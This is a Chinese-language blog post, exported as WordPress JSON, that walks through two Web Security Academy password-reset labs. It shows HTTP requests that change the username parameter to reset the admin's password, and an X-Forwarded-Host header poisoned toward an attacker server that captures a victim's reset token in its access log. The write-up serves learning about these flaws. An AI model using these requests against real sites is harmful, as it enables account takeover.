\u6709\u4e9b\u7528\u6236\u6703\u5fd8\u8a18\u5bc6\u78bc\uff0c\u56e0\u6b64\u7cfb\u7d71\u6703\u6709\u91cd\u8a2d\u5bc6\u78bc\u529f\u80fd\uff0c\u9019\u6709\u5e7e\u7a2e\u4e0d\u540c\u7684\u5be6\u4f5c\u65b9\u5f0f\uff0c\u800c\u4e14\u5b58\u5728\u4e0d\u540c\u7a0b\u5ea6\u7684\u91cd\u8a2d\u5bc6\u78bc\u6f0f\u6d1e\uff0c\u5e38\u767c\u751f\u7684\u5730\u65b9\u6709\u4ee5\u4e0b\u5169\u500b\uff1a<\/p>\n\n\n\n
\u5f88\u591a\u7cfb\u7d71\u56e0\u70ba\u6c92\u6709\u7d81\u5b9a\u5e33\u865f\uff0c\u56e0\u6b64\u53ef\u4ee5\u5e6b\u4efb\u4f55\u4eba\u91cd\u6539\u5bc6\u78bc\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n
\u4ee5\u4e0b\u70ba\u4f7f\u7528\u8005carlos\u66f4\u6539\u81ea\u5df1\u5bc6\u78bc\u7684\u8acb\u6c42 <\/p>\n\n\n\n
POST \/forgot-password?temp-forgot-password-token=zJuIal6i3fZ42mtO6b10UFtvSuXo6c7A\n...omit...\ntemp-forgot-password-token=zJuIal6i3fZ42mtO6b10UFtvSuXo6c7A&username=carlos&new-password-1=abc&new-password-2=abc<\/code><\/pre>\n\n\n\n\u4f46\u7531\u65bc\u7cfb\u7d71\u6c92\u6709\u505a\u4efb\u4f55\u904e\u6ffe\uff0c\u56e0\u6b64\u4f7f\u7528\u8005carlos\u53ef\u4ee5\u900f\u904eusername\u53c3\u6578\u6539\u4efb\u4f55\u4eba\u7684\u5bc6\u78bc\uff0c\u5982\u4e0b<\/p>\n\n\n\n
POST \/forgot-password?temp-forgot-password-token=zJuIal6i3fZ42mtO6b10UFtvSuXo6c7A\n...omit...\ntemp-forgot-password-token=zJuIal6i3fZ42mtO6b10UFtvSuXo6c7A&username=admin<\/mark>&new-password-1=abc&new-password-2=abc<\/code><\/pre>\n\n\n\n\u4ee5\u4e0a\u8acb\u6c42\u53ef\u8b93carlos\u76f4\u63a5\u66f4\u6539admin\u5bc6\u78bc<\/p>\n\n\n\n
Lab: Password reset broken logic<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u7528Email\u66f4\u6539\u5bc6\u78bc<\/h1>\n\n\n\n
\u5982\u679c\u80fd\u5077\u5230\u6539\u5bc6\u78bctoken\uff0c\u5c31\u80fd\u6539\u4efb\u610f\u4f7f\u7528\u8005\u5bc6\u78bc\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n
\u6b63\u5e38\u6d41\u7a0b<\/h3>\n\n\n\n
\u67d0\u7cfb\u7d71email\u6539\u5bc6\u78bc\u6d41\u7a0b\u5982\u4e0b<\/p>\n\n\n\n
1. \u5982\u679cwiener\u60f3\u66f4\u6539\u5bc6\u78bc\u6703\u767c\u9001\u4ee5\u4e0b\u8acb\u6c42<\/p>\n\n\n\n
POST \/forgot-password HTTP\/1.1\nHost: ac081f0e1ef832fe801c9a6b00c600e6.web-security-academy.net\n...omit...\nCookie: session=D3hW9m3Frhs79Gz574pETzcvvZOI4Yjl\n\ncsrf=xc9Bxe6exRqWazSU3fV6eyQulogqs2ch&username=wiener<\/code><\/pre>\n\n\n\n2.\u63a5\u8457wiener\u6703\u6536\u5230email\u9a57\u8b49\u4fe1\uff0c\u53ea\u8981\u8a2a\u554f\u9a57\u8b49\u9023\u7d50\u5c31\u53ef\u4ee5\u6539\u81ea\u5df1\u7684\u5bc6\u78bc<\/p>\n\n\n\n
Please follow the link below to reset your password.\n\nhttps://ac081f0e1ef832fe801c9a6b00c600e6.web-security-academy.net\/forgot-password?temp-forgot-password-token=7U9xxpdcAdc6IxMQ6PwIuhbDRC9YYJQo<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u653b\u64ca\u65b9\u6cd5<\/h3>\n\n\n\n
\u7531\u65bc\u7cfb\u7d71\u76f8\u4fe1x-forwarded-host\u7684\u4f4d\u7f6e\uff0c\u56e0\u6b64\u6703\u628a\u91cd\u8981\u7684\u8cc7\u8a0a\u4e5f\u9001\u5230\u9019\u500b\u4f4d\u7f6e\uff0c\u53ea\u8981\u628a\u4f4d\u7f6e\u6539\u6210\u81ea\u5df1\uff0c\u5c31\u80fd\u770b\u5230\u91cd\u8981\u8cc7\u8a0a<\/p>\n\n\n\n
1.\u4e00\u6a23\u5ef6\u7528\u4e4b\u524dwiener\u7684\u8acb\u6c42\uff0csession token\u4e0d\u8b8a\u4e00\u6a23\u4f7f\u7528wiener\u7684\uff0c\u4f46\u5c07username\u6539\u70ba\u53d7\u5bb3\u8005carlos\uff0c\u4e26\u589e\u52a0x-forwarded-host<\/p>\n\n\n\n
\u56e0\u6b64\u53ef\u4ee5\u69cb\u9020\u4ee5\u4e0b\u653b\u64ca\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n
POST \/forgot-password HTTP\/1.1\nHost: ac081f0e1ef832fe801c9a6b00c600e6.web-security-academy.net\n...omit...\nX-Forwarded-Host: attackserver.web-security-academy.net<\/mark>\nCookie: session=D3hW9m3Frhs79Gz574pETzcvvZOI4Yjl\n\t\ncsrf=xc9Bxe6exRqWazSU3fV6eyQulogqs2ch&username=carlos<\/mark><\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
2.\u5728\u653b\u64ca\u4e3b\u6a5f(attackserver.web-security-academy.net)\u7684access log\u6703\u770b\u5230\u4ee5\u4e0b\u65e5\u5fd7\uff0c\u53ef\u4ee5\u767c\u73fecarlos\u7684token\u986f\u793a\u5728\u4e0a\u9762<\/p>\n\n\n\n
...omit...\n172.31.30.50 2020-09-17 01:54:53 +0000 \"GET %2fforgot-password%3ftemp-forgot-password-token%3dXcqy8kyCDTMbQLuum1xqgLXXnkm8YqN7<\/mark> HTTP\/1.1\" 404\n...omit...<\/code><\/pre>\n\n\n\n3.\u5728wiener\u4fe1\u7bb1\u88e1\u6703\u6536\u5230\u7cfb\u7d71\u5bc4\u4f86\u7684\u7684\u9a57\u8b49\u9023\u7d50<\/p>\n\n\n\n
Please follow the link below to reset your password.\n\nhttps://ac081f0e1ef832fe801c9a6b00c600e6.web-security-academy.net\/forgot-password?temp-forgot-password-token=F4wgrXujxQVH6SJuxqTDkMWiot93uVDn<\/code><\/pre>\n\n\n\n4.\u5c07\u9a57\u8b49\u9023\u7d50\u7684token\u6539\u70bacarlos\u7684\u5982\u4e0b<\/p>\n\n\n\n
https:\/\/ac081f0e1ef832fe801c9a6b00c600e6.web-security-academy.net\/forgot-password?temp-forgot-password-token=dXcqy8kyCDTMbQLuum1xqgLXXnkm8YqN7<\/mark><\/code><\/p>\n\n\n\n\u8a2a\u554f\u8a72\u93c8\u7d50\u5f8c\u5c31\u53ef\u4fee\u6539carlos\u7684\u5bc6\u78bc<\/p>\n\n\n\n
Lab: Password reset poisoning via middleware<\/p>\n\n\n\n
\n","protected":false},"excerpt":{"rendered":"\u6709\u4e9b\u7528\u6236\u6703\u5fd8\u8a18\u5bc6\u78bc\uff0c\u56e0\u6b64\u7cfb\u7d71\u6703\u6709\u91cd\u8a2d\u5bc6\u78bc\u529f\u80fd\uff0c\u9019\u6709\u5e7e\u7a2e\u4e0d\u540c\u7684\u5be6\u4f5c\u65b9\u5f0f\uff0c\u800c\u4e14\u5b58\u5728\u4e0d\u540c\u7a0b\u5ea6\u7684\u6f0f\u6d1e<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[367],"tags":[],"class_list":["post-1531","post","type-post","status-publish","format-standard","hentry","category-logic-vulnerabilities"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1531","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1531"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1531\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1531"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1531"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1531"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}